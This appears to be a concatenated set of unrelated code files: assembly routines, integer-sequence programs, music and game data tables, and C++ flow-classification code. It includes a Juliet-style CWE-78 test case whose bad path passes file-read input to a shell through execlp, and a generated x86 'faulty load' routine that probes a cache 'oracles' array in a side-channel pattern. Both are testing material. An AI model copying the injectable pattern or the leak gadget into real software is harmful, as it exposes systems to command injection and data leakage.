section .note.GNU-stack noalloc noexec nowrite progbits
section .text
%elifidn __OUTPUT_FORMAT__,elf64
section .note.GNU-stack noalloc noexec nowrite progbits
section .text
%elifidn __OUTPUT_FORMAT__,elfx32
section .note.GNU-stack noalloc noexec nowrite progbits
section .text
%endif
|
; is string a valid alpha lower string 12/02-92 O.Fink
section string
include win1_keys_err
xdef st_isalc ; is character alpha lower
xdef st_isals ; is string alpha lower
;+++
; is character alpha lower character
;
; Entry Exit
; d1.b character preserved
;
; error codes: err.nc no unsigned integer character
; condition codes set
;---
st_isalc
moveq #err.nc,d0
cmpi.b #'a',d1
blt.s c_exit
cmpi.b #'z',d1
bhi.s c_exit
moveq #0,d0
c_exit
tst.l d0
rts
;+++
; is string alpha lower
;
; Entry Exit
; a0 ptr to string preserved
;
;
; error codes: err.nc no unsigned alpha lower string
; condition codes set
;---
r_isals reg a0/d1/d2
st_isals
movem.l r_isals,-(sp)
moveq #err.nc,d0
move.w (a0)+,d2
beq.s s_exit
bra.s s_end
s_lp
move.b (a0)+,d1
bsr st_isalc
bne.s s_exit
s_end
dbra d2,s_lp
s_exit
movem.l (sp)+,r_isals
tst.l d0
rts
end
|
; A128496: Row sums of unsigned triangle |A128495|=|S(2;n,m)| (sums of squares of Chebyshev's S-polynomials).
; 1,2,4,9,20,50,125,324,840,2195,5736,15012,39289,102854,269260,704925,1845500,4831574,12649205,33116040,86698896,226980647,594243024,1555748424,4073002225,10663258250,27916772500,73087059249,191344405220
mov $1,2
add $1,$0
div $1,2
lpb $0
mov $2,$0
trn $0,2
seq $2,1654 ; Golden rectangle numbers: F(n)*F(n+1), where F(n) = A000045(n) (Fibonacci numbers).
add $1,$2
lpe
mov $0,$1
|
; A037156: 10^n*(10^n+1)/2.
; 1,55,5050,500500,50005000,5000050000,500000500000,50000005000000,5000000050000000,500000000500000000,50000000005000000000,5000000000050000000000,500000000000500000000000
mov $1,10
pow $1,$0
add $1,1
bin $1,2
mov $0,$1
|
; A273409: Partial sums of the number of active (ON,black) cells in n-th stage of growth of two-dimensional cellular automaton defined by "Rule 678", based on the 5-celled von Neumann neighborhood.
; 1,6,11,28,37,66,87,152,177,254,291,404,453,602,687,944,1033,1302,1403,1708,1821,2162,2311,2760,2921,3406,3603,4196,4429,5130,5471,6496,6841,7878,8235,9308,9677,10786,11191,12408,12825,14078,14531,15892,16381,17850,18447,20240,20849,22678,23323,25260,25941,27986,28775,31144,31969,34446,35379,38180,39221,42346,43711,47808,49177,53286,54667,58812,60205,64386,65815,70104,71545,75870,77347,81780,83293,87834,89455,94320,95953,100854,102523,107532,109237,114354,116167,121608,123457,129006,130963,136836,138901,145098,147487,154656,157057,164262,166699,174012
lpb $0
mov $2,$0
sub $0,1
seq $2,79317 ; Number of ON cells after n generations of cellular automaton on square grid in which cells which share exactly one edge with an ON cell change their state.
add $1,$2
lpe
add $1,1
mov $0,$1
|
SECTION code_clib
PUBLIC xor_MODE1
.xor_MODE1
defc NEEDxor = 1
INCLUDE "target/gal/graphics/pixel_MODE1.inc"
|
.section .text.entry # 指定段名为 .text.entry,对应 linker.ld 中第一部分,所以这个 asm 会被放在 .text 的首部,即 0x8020000
.globl _start # 声明全局符号 _start,在 linker.ld 中将它指定为了整个 os 镜像的入口
_start:
la sp, boot_stack_top # 设置 sp 寄存器
call rust_main # 初始化栈结束,跳到 rust 入口
.section .bss.stack # 此栈被放入 linker.ld 指定的 .bss 段的低地址空间
.globl boot_stack # 全局符号 boot_stack,表示栈底
boot_stack:
.space 4096*16 # 64KB 栈空间,栈向下生长
.globl boot_stack_top
boot_stack_top: |
version https://git-lfs.github.com/spec/v1
oid sha256:2d9f170fdecb359c434387e6379fe5f16f9ffc77ef8dc4ba111ca517c3359023
size 42185
|
; int vfprintf(FILE *fp, unsigned char *fmt,void *ap)
MODULE vfprintf
SECTION code_clib
PUBLIC vfprintf
EXTERN fputc_callee
EXTERN asm_printf
; Cores have signature (in __smallc)
; int vfprintf1(FILE *fp, void (*output_fn)(FILE *fp,int c), int sccz80, unsigned char *fmt,void *ap)
; sccz80
vfprintf:
pop af
pop hl ; ap
pop de ; fmt
pop bc ; fp
push bc
push de
push hl
push af
IF !__CPU_INTEL__
push ix
ENDIF
push bc ;fp
ld bc,fputc_callee ;output_fn
push bc
ld bc,1 ;sccz80
push bc
push de ;fmt
push hl ;ap
call asm_printf
pop bc
pop bc
pop bc
pop bc
pop bc
IF !__CPU_INTEL__
pop ix
ENDIF
ret
|
/* TEMPLATE GENERATED TESTCASE FILE
Filename: CWE78_OS_Command_Injection__wchar_t_file_execlp_72a.cpp
Label Definition File: CWE78_OS_Command_Injection.strings.label.xml
Template File: sources-sink-72a.tmpl.cpp
*/
/*
* @description
* CWE: 78 OS Command Injection
* BadSource: file Read input from a file
* GoodSource: Fixed string
* Sinks: execlp
* BadSink : execute command with wexeclp
* Flow Variant: 72 Data flow: data passed in a vector from one function to another in different source files
*
* */
#include "std_testcase.h"
#include <vector>
#include <wchar.h>
#ifdef _WIN32
#define COMMAND_INT_PATH L"%WINDIR%\\system32\\cmd.exe"
#define COMMAND_INT L"cmd.exe"
#define COMMAND_ARG1 L"/c"
#define COMMAND_ARG2 L"dir "
#define COMMAND_ARG3 data
#else /* NOT _WIN32 */
#include <unistd.h>
#define COMMAND_INT_PATH L"/bin/sh"
#define COMMAND_INT L"sh"
#define COMMAND_ARG1 L"-c"
#define COMMAND_ARG2 L"ls "
#define COMMAND_ARG3 data
#endif
#ifdef _WIN32
#define FILENAME "C:\\temp\\file.txt"
#else
#define FILENAME "/tmp/file.txt"
#endif
using namespace std;
namespace CWE78_OS_Command_Injection__wchar_t_file_execlp_72
{
#ifndef OMITBAD
/* bad function declaration */
void badSink(vector<wchar_t *> dataVector);
void bad()
{
wchar_t * data;
vector<wchar_t *> dataVector;
wchar_t dataBuffer[100] = COMMAND_ARG2;
data = dataBuffer;
{
/* Read input from a file */
size_t dataLen = wcslen(data);
FILE * pFile;
/* if there is room in data, attempt to read the input from a file */
if (100-dataLen > 1)
{
pFile = fopen(FILENAME, "r");
if (pFile != NULL)
{
/* POTENTIAL FLAW: Read data from a file */
if (fgetws(data+dataLen, (int)(100-dataLen), pFile) == NULL)
{
printLine("fgetws() failed");
/* Restore NUL terminator if fgetws fails */
data[dataLen] = L'\0';
}
fclose(pFile);
}
}
}
/* Put data in a vector */
dataVector.insert(dataVector.end(), 1, data);
dataVector.insert(dataVector.end(), 1, data);
dataVector.insert(dataVector.end(), 1, data);
badSink(dataVector);
}
#endif /* OMITBAD */
#ifndef OMITGOOD
/* good function declarations */
/* goodG2B uses the GoodSource with the BadSink */
void goodG2BSink(vector<wchar_t *> dataVector);
static void goodG2B()
{
wchar_t * data;
vector<wchar_t *> dataVector;
wchar_t dataBuffer[100] = COMMAND_ARG2;
data = dataBuffer;
/* FIX: Append a fixed string to data (not user / external input) */
wcscat(data, L"*.*");
/* Put data in a vector */
dataVector.insert(dataVector.end(), 1, data);
dataVector.insert(dataVector.end(), 1, data);
dataVector.insert(dataVector.end(), 1, data);
goodG2BSink(dataVector);
}
void good()
{
goodG2B();
}
#endif /* OMITGOOD */
} /* close namespace */
/* Below is the main(). It is only used when building this testcase on
* its own for testing or for building a binary to use in testing binary
* analysis tools. It is not used when compiling all the testcases as one
* application, which is how source code analysis tools are tested.
*/
#ifdef INCLUDEMAIN
using namespace CWE78_OS_Command_Injection__wchar_t_file_execlp_72; /* so that we can use good and bad easily */
int main(int argc, char * argv[])
{
/* seed randomness */
srand( (unsigned)time(NULL) );
#ifndef OMITGOOD
printLine("Calling good()...");
good();
printLine("Finished good()");
#endif /* OMITGOOD */
#ifndef OMITBAD
printLine("Calling bad()...");
bad();
printLine("Finished bad()");
#endif /* OMITBAD */
return 0;
}
#endif
|
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r13
push %r15
push %r9
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_UC_ht+0x1272e, %rdi
nop
cmp %r9, %r9
movl $0x61626364, (%rdi)
nop
nop
nop
nop
nop
add %rbx, %rbx
lea addresses_WC_ht+0x1ae3a, %rbx
nop
nop
nop
nop
nop
inc %r10
movw $0x6162, (%rbx)
nop
nop
add %rcx, %rcx
lea addresses_WT_ht+0x12206, %r15
nop
add $31257, %r13
mov (%r15), %bx
xor $24203, %rbx
lea addresses_A_ht+0x17f2e, %rsi
lea addresses_WC_ht+0xa962, %rdi
clflush (%rsi)
nop
inc %r9
mov $36, %rcx
rep movsw
nop
nop
xor %rsi, %rsi
lea addresses_D_ht+0x193be, %r9
nop
nop
nop
nop
nop
add $49085, %rbx
mov $0x6162636465666768, %r13
movq %r13, (%r9)
nop
nop
nop
nop
add %rsi, %rsi
lea addresses_WT_ht+0x7b2e, %rsi
lea addresses_normal_ht+0x1a72e, %rdi
nop
xor %r9, %r9
mov $43, %rcx
rep movsq
nop
nop
nop
add %r15, %r15
pop %rsi
pop %rdi
pop %rcx
pop %rbx
pop %r9
pop %r15
pop %r13
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r11
push %r13
push %rbp
push %rdi
push %rdx
// Faulty Load
lea addresses_US+0x14f2e, %rbp
nop
nop
nop
nop
nop
and %rdx, %rdx
movups (%rbp), %xmm3
vpextrq $0, %xmm3, %r11
lea oracles, %rdi
and $0xff, %r11
shlq $12, %r11
mov (%rdi,%r11,1), %r11
pop %rdx
pop %rdi
pop %rbp
pop %r13
pop %r11
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'type': 'addresses_US', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'type': 'addresses_US', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}}
<gen_prepare_buffer>
{'OP': 'STOR', 'dst': {'type': 'addresses_UC_ht', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 6, 'same': True}}
{'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_WT_ht', 'size': 2, 'AVXalign': False, 'NT': True, 'congruent': 3, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_A_ht', 'congruent': 9, 'same': False}, 'dst': {'type': 'addresses_WC_ht', 'congruent': 2, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_D_ht', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 3, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_WT_ht', 'congruent': 10, 'same': False}, 'dst': {'type': 'addresses_normal_ht', 'congruent': 9, 'same': False}}
{'00': 9}
00 00 00 00 00 00 00 00 00
*/
|
; A065760: Concatenation of increasing number of alternating digits in base 2, starting with 1.
; Submitted by Jon Maiga
; 1,4,39,624,19999,1279936,163831935,41940975360,21473779384831,21989150090066944,45033779384457103359,184458360358736295358464,1511082888058767731576545279,24757582037954850514150117851136,811256448219704541647671061746057215,53166502590526556841421770702589605642240,6968639827545496858318834329529824790739812351,1826787118952086728427132506480266389943697368940544,957762565021151646673604447557525905050801206167100456959,1004286839379619109062421457202080283414548925557873528756240384
add $0,1
mov $2,$0
mov $4,1
lpb $2
mul $4,2
mul $1,$4
mov $3,$4
sub $3,1
cmp $5,0
mul $3,$5
add $1,$3
sub $2,1
lpe
mov $0,$1
|
; $Id: ASMBitFirstSet.asm 69111 2017-10-17 14:26:02Z vboxsync $
;; @file
; IPRT - ASMBitFirstSet().
;
;
; Copyright (C) 2006-2017 Oracle Corporation
;
; This file is part of VirtualBox Open Source Edition (OSE), as
; available from http://www.virtualbox.org. This file is free software;
; you can redistribute it and/or modify it under the terms of the GNU
; General Public License (GPL) as published by the Free Software
; Foundation, in version 2 as it comes in the "COPYING" file of the
; VirtualBox OSE distribution. VirtualBox OSE is distributed in the
; hope that it will be useful, but WITHOUT ANY WARRANTY of any kind.
;
; The contents of this file may alternatively be used under the terms
; of the Common Development and Distribution License Version 1.0
; (CDDL) only, as it comes in the "COPYING.CDDL" file of the
; VirtualBox OSE distribution, in which case the provisions of the
; CDDL are applicable instead of those of the GPL.
;
; You may elect to license modified versions of this file under the
; terms and conditions of either the GPL or the CDDL or both.
;
;*******************************************************************************
;* Header Files *
;*******************************************************************************
%include "iprt/asmdefs.mac"
BEGINCODE
;;
; Finds the first set bit in a bitmap.
;
; @returns (32/64:eax, 16:ax+dx) Index of the first zero bit.
; @returns (32/64:eax, 16:ax+dx) -1 if no set bit was found.
; @param msc:rcx gcc:rdi pvBitmap Pointer to the bitmap.
; @param msc:edx gcc:rsi cBits The number of bits in the bitmap. Multiple of 32.
;
BEGINPROC_EXPORTED ASMBitFirstSet
;
; if (cBits)
; Put cBits in ecx first.
;
%if ARCH_BITS == 64
%ifdef ASM_CALL64_GCC
mov ecx, esi
%else
xchg rcx, rdx ; rdx=pvDst, ecx=cBits
%endif
%elif ARCH_BITS == 32
mov ecx, [esp + 4 + 4]
%elif ARCH_BITS == 16
push bp
mov bp, sp
mov ecx, [bp + 4 + 4]
%endif
or ecx, ecx
jz short .failed
;{
push xDI
; asm {...}
%if ARCH_BITS == 64
%ifdef ASM_CALL64_GCC
; rdi = start of scasd - already done
%else
mov rdi, rdx ; rdi = start of scasd (Note! xchg rdx,rcx above)
%endif
%elif ARCH_BITS == 32
mov edi, [esp + 4]
%elif ARCH_BITS == 16
mov ax, [bp + 4 + 2]
mov di, [bp + 4]
mov es, ax ; es is volatile, no need to save.
%endif
add ecx, 31 ; 32 bit aligned
shr ecx, 5 ; number of dwords to scan.
mov xDX, xDI ; xDX = saved pvBitmap
xor eax, eax
repe scasd ; Scan for the first dword with any bit set.
je .failed_restore
; find the bit in question
sub xDI, 4 ; one step back.
%if ARCH_BITS == 16
movzx edi, di
mov eax, [es:xDI]
%else
mov eax, [xDI]
%endif
sub xDI, xDX
shl edi, 3 ; calc bit offset.
bsf ecx, eax
jz .failed_restore ; race paranoia
add ecx, edi
mov eax, ecx
; return success
pop xDI
%if ARCH_BITS == 16
mov edx, eax
shr edx, 16
leave
%endif
ret
; failure
;}
;return -1;
.failed_restore:
pop xDI
.failed:
%if ARCH_BITS != 16
mov eax, 0ffffffffh
%else
mov ax, 0ffffh
mov dx, ax
leave
%endif
ret
ENDPROC ASMBitFirstSet
|
; Music struct
RSRESET
CTRL_BYTE RB 1 ; Bit 0: Active (0: Off 1: On)
; Bit 1: Muted (0: Off 1: On)
WAITING_TIME RW 1
CURRENT_ELEM_PTR RW 1
NB_REGISTERS RB 1
REGISTERS_PTR RW 1
FREQUENCY_PTR RW 1
NB_REPEAT RB 1
REPEAT_PTR RW 1
MUSIC_STRUCT_SIZE RB 1
; Music
SEMIQUAVER EQU $3
QUAVER EQU 2 * SEMIQUAVER
DOTTED_QUAVER EQU QUAVER + SEMIQUAVER
CROTCHET EQU 2 * QUAVER
DOTTED_CROTCHET EQU 2 * DOTTED_QUAVER
MINIM EQU 2 * CROTCHET
DOTTED_MINIM EQU 2 * DOTTED_CROTCHET
SEMIBREVE EQU 2 * MINIM
DOTTED_SEMIBREVE EQU 2 * DOTTED_MINIM
QUAVER3 EQU CROTCHET / 3
SEMIQUAVER3 EQU QUAVER3 / 2
; Notes
NOTE_Cb EQU 247
NOTE_C EQU 262
NOTE_C_SHARP EQU 277
NOTE_Db EQU 277
NOTE_D EQU 294
NOTE_D_SHARP EQU 311
NOTE_Eb EQU 311
NOTE_E EQU 330
NOTE_Fb EQU 330
NOTE_E_SHARP EQU 349
NOTE_F EQU 349
NOTE_F_SHARP EQU 370
NOTE_Gb EQU 370
NOTE_G EQU 392
NOTE_G_SHARP EQU 415
NOTE_Ab EQU 415
NOTE_A EQU 440
NOTE_A_SHARP EQU 466
NOTE_Bb EQU 466
NOTE_B EQU 494
NOTE_B_SHARP EQU 524
; Music No Sound
TERMINAL_ONE EQU %00010001
TERMINAL_TWO EQU %00100010
TERMINAL_THREE EQU %01000100
TERMINAL_FOUR EQU %10001000
; Music header
RSRESET
TIMER_MODULO RB 1
TIMER_CONTROL RB 1
NB_PROGRAMS RB 1
PROGRAMS_PTRS RB 1
; Music commands
RSRESET
SET_FREQU RB 1
SET_VOL RB 1
WAIT RB 1
JUMP RB 1
DIS_TERM RB 1
ENA_TERM RB 1
SET_REGISTERS RB 1
STOP_MUS RB 1
PLAY RB 1
REPEAT RB 1
CONTINUE RB 1
continue: MACRO
db CONTINUE
ENDM
repeat: MACRO
db REPEAT
db \1 - 1
ENDM
play: MACRO
db PLAY
db ((2048 - 131072 / (\1)) >> 8) | (\2)
ENDM
playRaw: MACRO
db PLAY
db \1
ENDM
setFrequency: MACRO ; setFrequency(byte frequency)
ASSERT (2048 - 131072 / (\1)) > 0
db SET_FREQU
dw (2048 - 131072 / (\1)) | ((\2)) << 8
ENDM
setFrequencyRaw: MACRO ; setFrequency(byte frequency)
db SET_FREQU
dw (\1) | ((\2)) << 8
ENDM
setVolume: MACRO ; setVolume(byte volume)
db SET_VOL
db \1
ENDM
setRegisters: MACRO ; setRegisters(byte values[nbRegisters])
db SET_REGISTERS
IF _NARG == 4
db \1, \2, \3, \4
ELIF _NARG == 5
db \1, \2, \3, \4, \5
ELSE
PRINTT "setRegister should take either 4 or 5 arguments but "
PRINTI _NARG
PRINTT " were given."
FAIL
ENDC
ENDM
disableTerminals: MACRO ; disableTerminals(byte terminalsMask)
db DIS_TERM
db ~(\1)
ENDM
enableTerminals: MACRO ; enableTerminals(byte terminalsMask)
db ENA_TERM
db \1
ENDM
wait: MACRO ; wait(unsigned short units)
db WAIT
dw ((\1) + $100)
ENDM
jump: MACRO ; jump(unsigned addr)
db JUMP
dw \1
ENDM
stopMusic: MACRO ; stopMusic()
db STOP_MUS
ENDM
writeRegisterI: MACRO
push hl
ld h, Channel1Mirror >> 8
ld [hl], \1
pop hl
ldi [hl], \1
ENDM
writeRegister: MACRO
push hl
ld h, Channel1Mirror >> 8
ld [hl], \1
pop hl
ld [hl], \1
ENDM |
; A160128: a(n) = number of grid points that are covered after (2^n)th stage of A139250.
; 3,7,19,63,235,919,3651,14575,58267,233031,932083,3728287,14913099,59652343,238609315,954437199,3817748731,15270994855,61083979347,244335917311,977343669163,3909374676567,15637498706179
mov $1,$0
mov $2,4
pow $2,$0
add $1,$2
mul $1,2
add $1,$0
mov $0,$1
div $0,9
mul $0,4
add $0,3
|
BitmasksPointers:
dw BulbasaurBitmasks
dw IvysaurBitmasks
dw VenusaurBitmasks
dw CharmanderBitmasks
dw CharmeleonBitmasks
dw CharizardBitmasks
dw SquirtleBitmasks
dw WartortleBitmasks
dw BlastoiseBitmasks
dw CaterpieBitmasks
dw MetapodBitmasks
dw ButterfreeBitmasks
dw WeedleBitmasks
dw KakunaBitmasks
dw BeedrillBitmasks
dw PidgeyBitmasks
dw PidgeottoBitmasks
dw PidgeotBitmasks
dw RattataBitmasks
dw RaticateBitmasks
dw SpearowBitmasks
dw FearowBitmasks
dw EkansBitmasks
dw ArbokBitmasks
dw PikachuBitmasks
dw RaichuBitmasks
dw SandshrewBitmasks
dw SandslashBitmasks
dw NidoranFBitmasks
dw NidorinaBitmasks
dw NidoqueenBitmasks
dw NidoranMBitmasks
dw NidorinoBitmasks
dw NidokingBitmasks
dw ClefairyBitmasks
dw ClefableBitmasks
dw VulpixBitmasks
dw NinetalesBitmasks
dw JigglypuffBitmasks
dw WigglytuffBitmasks
dw ZubatBitmasks
dw GolbatBitmasks
dw OddishBitmasks
dw GloomBitmasks
dw VileplumeBitmasks
dw ParasBitmasks
dw ParasectBitmasks
dw VenonatBitmasks
dw VenomothBitmasks
dw DiglettBitmasks
dw DugtrioBitmasks
dw MeowthBitmasks
dw PersianBitmasks
dw PsyduckBitmasks
dw GolduckBitmasks
dw MankeyBitmasks
dw PrimeapeBitmasks
dw GrowlitheBitmasks
dw ArcanineBitmasks
dw PoliwagBitmasks
dw PoliwhirlBitmasks
dw PoliwrathBitmasks
dw AbraBitmasks
dw KadabraBitmasks
dw AlakazamBitmasks
dw MachopBitmasks
dw MachokeBitmasks
dw MachampBitmasks
dw BellsproutBitmasks
dw WeepinbellBitmasks
dw VictreebelBitmasks
dw TentacoolBitmasks
dw TentacruelBitmasks
dw GeodudeBitmasks
dw GravelerBitmasks
dw GolemBitmasks
dw PonytaBitmasks
dw RapidashBitmasks
dw SlowpokeBitmasks
dw SlowbroBitmasks
dw MagnemiteBitmasks
dw MagnetonBitmasks
dw FarfetchDBitmasks
dw DoduoBitmasks
dw DodrioBitmasks
dw SeelBitmasks
dw DewgongBitmasks
dw GrimerBitmasks
dw MukBitmasks
dw ShellderBitmasks
dw CloysterBitmasks
dw GastlyBitmasks
dw HaunterBitmasks
dw GengarBitmasks
dw OnixBitmasks
dw DrowzeeBitmasks
dw HypnoBitmasks
dw KrabbyBitmasks
dw KinglerBitmasks
dw VoltorbBitmasks
dw ElectrodeBitmasks
dw ExeggcuteBitmasks
dw ExeggutorBitmasks
dw CuboneBitmasks
dw MarowakBitmasks
dw HitmonleeBitmasks
dw HitmonchanBitmasks
dw LickitungBitmasks
dw KoffingBitmasks
dw WeezingBitmasks
dw RhyhornBitmasks
dw RhydonBitmasks
dw ChanseyBitmasks
dw TangelaBitmasks
dw KangaskhanBitmasks
dw HorseaBitmasks
dw SeadraBitmasks
dw GoldeenBitmasks
dw SeakingBitmasks
dw StaryuBitmasks
dw StarmieBitmasks
dw MrMimeBitmasks
dw ScytherBitmasks
dw JynxBitmasks
dw ElectabuzzBitmasks
dw MagmarBitmasks
dw PinsirBitmasks
dw TaurosBitmasks
dw MagikarpBitmasks
dw GyaradosBitmasks
dw LaprasBitmasks
dw DittoBitmasks
dw EeveeBitmasks
dw VaporeonBitmasks
dw JolteonBitmasks
dw FlareonBitmasks
dw PorygonBitmasks
dw OmanyteBitmasks
dw OmastarBitmasks
dw KabutoBitmasks
dw KabutopsBitmasks
dw AerodactylBitmasks
dw SnorlaxBitmasks
dw ArticunoBitmasks
dw ZapdosBitmasks
dw MoltresBitmasks
dw DratiniBitmasks
dw DragonairBitmasks
dw DragoniteBitmasks
dw MewtwoBitmasks
dw MewBitmasks
dw ChikoritaBitmasks
dw BayleefBitmasks
dw MeganiumBitmasks
dw CyndaquilBitmasks
dw QuilavaBitmasks
dw TyphlosionBitmasks
dw TotodileBitmasks
dw CroconawBitmasks
dw FeraligatrBitmasks
dw SentretBitmasks
dw FurretBitmasks
dw HoothootBitmasks
dw NoctowlBitmasks
dw LedybaBitmasks
dw LedianBitmasks
dw SpinarakBitmasks
dw AriadosBitmasks
dw CrobatBitmasks
dw ChinchouBitmasks
dw LanturnBitmasks
dw PichuBitmasks
dw CleffaBitmasks
dw IgglybuffBitmasks
dw TogepiBitmasks
dw TogeticBitmasks
dw NatuBitmasks
dw XatuBitmasks
dw MareepBitmasks
dw FlaaffyBitmasks
dw AmpharosBitmasks
dw BellossomBitmasks
dw MarillBitmasks
dw AzumarillBitmasks
dw SudowoodoBitmasks
dw PolitoedBitmasks
dw HoppipBitmasks
dw SkiploomBitmasks
dw JumpluffBitmasks
dw AipomBitmasks
dw SunkernBitmasks
dw SunfloraBitmasks
dw YanmaBitmasks
dw WooperBitmasks
dw QuagsireBitmasks
dw EspeonBitmasks
dw UmbreonBitmasks
dw MurkrowBitmasks
dw SlowkingBitmasks
dw MisdreavusBitmasks
dw UnownBitmasks
dw WobbuffetBitmasks
dw GirafarigBitmasks
dw PinecoBitmasks
dw ForretressBitmasks
dw DunsparceBitmasks
dw GligarBitmasks
dw SteelixBitmasks
dw SnubbullBitmasks
dw GranbullBitmasks
dw QwilfishBitmasks
dw ScizorBitmasks
dw ShuckleBitmasks
dw HeracrossBitmasks
dw SneaselBitmasks
dw TeddiursaBitmasks
dw UrsaringBitmasks
dw SlugmaBitmasks
dw MagcargoBitmasks
dw SwinubBitmasks
dw PiloswineBitmasks
dw CorsolaBitmasks
dw RemoraidBitmasks
dw OctilleryBitmasks
dw DelibirdBitmasks
dw MantineBitmasks
dw SkarmoryBitmasks
dw HoundourBitmasks
dw HoundoomBitmasks
dw KingdraBitmasks
dw PhanpyBitmasks
dw DonphanBitmasks
dw Porygon2Bitmasks
dw StantlerBitmasks
dw SmeargleBitmasks
dw TyrogueBitmasks
dw HitmontopBitmasks
dw SmoochumBitmasks
dw ElekidBitmasks
dw MagbyBitmasks
dw MiltankBitmasks
dw BlisseyBitmasks
dw RaikouBitmasks
dw EnteiBitmasks
dw SuicuneBitmasks
dw LarvitarBitmasks
dw PupitarBitmasks
dw TyranitarBitmasks
dw LugiaBitmasks
dw HoOhBitmasks
dw CelebiBitmasks
dw TreeckoBitmasks
dw GrovyleBitmasks
dw SceptileBitmasks
dw TorchicBitmasks
dw CombuskenBitmasks
dw BlazikenBitmasks
dw MudkipBitmasks
dw MarshtompBitmasks
dw SwampertBitmasks
dw PoochyenaBitmasks
dw MightyenaBitmasks
dw ZigzagoonBitmasks
dw LinooneBitmasks
dw WurmpleBitmasks
dw SilcoonBitmasks
dw BeautiflyBitmasks
dw CascoonBitmasks
dw DustoxBitmasks
dw LotadBitmasks
dw LombreBitmasks
dw LudicoloBitmasks
dw SeedotBitmasks
dw NuzleafBitmasks
dw ShiftryBitmasks
dw TaillowBitmasks
dw SwellowBitmasks
dw WingullBitmasks
dw PelipperBitmasks
dw RaltsBitmasks
dw KirliaBitmasks
dw GardevoirBitmasks
dw SurskitBitmasks
dw MasquerainBitmasks
dw ShroomishBitmasks
dw BreloomBitmasks
dw SlakothBitmasks
dw VigorothBitmasks
dw SlakingBitmasks
dw NincadaBitmasks
dw NinjaskBitmasks
dw ShedinjaBitmasks
dw WhismurBitmasks
dw LoudredBitmasks
dw ExploudBitmasks
dw MakuhitaBitmasks
dw HariyamaBitmasks
dw AzurillBitmasks
dw NosepassBitmasks
dw SkittyBitmasks
dw DelcattyBitmasks
dw SableyeBitmasks
dw MawileBitmasks
dw AronBitmasks
dw LaironBitmasks
dw AggronBitmasks
dw MedititeBitmasks
dw MedichamBitmasks
dw ElectrikeBitmasks
dw ManectricBitmasks
|
// -*- c-basic-offset: 4; related-file-name: "../include/click/flow/flow.hh" -*-
/*
* flow.{cc,hh} -- the Flow class
* Tom Barbette
*
* Copyright (c) 2015 University of Liege
* Copyright (c) 2019-2021 KTH Royal Institute of Technology
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software")
* to deal in the Software without restriction, subject to the conditions
* listed in the Click LICENSE file. These conditions include: you must
* preserve this copyright notice, and you cannot mention the copyright
* holders in advertising related to the Software without their permission.
* The Software is provided WITHOUT ANY WARRANTY, EXPRESS OR IMPLIED. This
* notice is a summary of the Click LICENSE file; the license in that file is
* legally binding.
*/
#include <click/config.h>
#include <click/glue.hh>
#include <stdlib.h>
#include <regex>
#include <click/flow/flow.hh>
#include <click/flow/flowelement.hh>
#include <click/flow/ctxelement.hh>
CLICK_DECLS
#ifdef HAVE_FLOW
__thread FlowControlBlock* fcb_stack = 0;
__thread FlowTableHolder* fcb_table = 0;
/*******************************
* FlowClassificationTable
*******************************/
FlowClassificationTable::FlowClassificationTable() : _root(0)
{
}
void FlowClassificationTable::set_root(FlowNode* node) {
assert(node);
assert(_classifier_release_fnt);
_root = node;
/*#if HAVE_DYNAMIC_FLOW_RELEASE_FNT
auto fnt = [this](FlowControlBlock* fcb){
fcb->release_fnt = _classifier_release_fnt;
};
node->traverse<decltype(fnt)>(fnt);
#endif*/
}
FlowNode* FlowClassificationTable::get_root() {
return _root;
}
FlowTableHolder::FlowTableHolder() :
#if HAVE_FLOW_RELEASE_SLOPPY_TIMEOUT
old_flows(fcb_list()),
#endif
_pool(), _classifier_release_fnt(0), _classifier_thunk(0)
{
}
#if HAVE_FLOW_RELEASE_SLOPPY_TIMEOUT
void
FlowTableHolder::delete_all_flows() {
for (int i = 0; i < old_flows.weight(); i++) {
fcb_list& head = old_flows.get_value(i);
FlowControlBlock* next = 0;
FlowControlBlock* b = head._next;
FlowControlBlock** prev = &head._next;
#if DEBUG_CLASSIFIER_TIMEOUT_CHECK || DEBUG_CLASSIFIER_TIMEOUT
assert(head.count() == head.find_count());
#endif
while (b != 0) {
next = b->next;
b->flags = 0;
*prev = b->next;
head._count--;
#if HAVE_FLOW_DYNAMIC
b->_do_release();
#endif
b = next;
}
}
}
#endif
FlowTableHolder::~FlowTableHolder() {
auto previous = fcb_table;
fcb_table = this;
#if HAVE_FLOW_RELEASE_SLOPPY_TIMEOUT
//TODO : same, do from the right thread
//delete_all_flows();
#endif
fcb_table = previous;
}
void FlowTableHolder::set_release_fnt(SubFlowRealeaseFnt pool_release_fnt, void* thunk) {
_classifier_release_fnt = pool_release_fnt;
_classifier_thunk = thunk;
}
FlowClassificationTable::~FlowClassificationTable() {
bool previous = pool_allocator_mt_base::dying();
pool_allocator_mt_base::set_dying(true);
if (_root)
delete _root;
_root = 0;
pool_allocator_mt_base::set_dying(previous);
}
FlowClassificationTable::Rule FlowClassificationTable::make_ip_mask(IPAddress dst, IPAddress mask) {
FlowLevelGeneric32* fl = new FlowLevelGeneric32();
fl->set_match(offsetof(click_ip,ip_dst),mask.addr());
FlowNodeDefinition* node = new FlowNodeDefinition(0);
node->_level = fl;
node->_parent = 0;
FlowControlBlock* fcb = FCBPool::init_allocate();
FlowNodeData ip = FlowNodeData(dst.addr());
bool need_grow;
FlowNodePtr* parent_ptr = node->find(ip,need_grow);
parent_ptr->set_leaf(fcb);
parent_ptr->set_data(ip);
parent_ptr->leaf->parent = node;
#if HAVE_FLOW_DYNAMIC
parent_ptr->leaf->acquire(1);
#endif
node->inc_num();
return Rule{.root=node};
}
